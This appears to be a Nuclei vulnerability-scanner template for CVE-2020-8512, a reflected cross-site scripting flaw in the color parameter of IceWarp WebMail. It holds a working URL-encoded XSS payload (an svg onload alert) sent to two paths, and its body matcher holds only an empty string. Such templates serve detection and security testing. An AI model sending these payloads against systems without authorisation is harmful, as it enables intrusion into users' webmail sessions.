id: cve-2020-8512 info: name: IceWarp WebMail XSS author: pdnuclei & dwisiswant0 severity: medium description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter. # source:- https://www.exploit-db.com/exploits/47988 # https://twitter.com/sagaryadav8742/status/1275170967527006208 requests: - method: GET path: - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22' - '{{BaseURL}}:32000/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22' matchers-condition: and matchers: - type: word words: - "" part: body - type: status status: - 200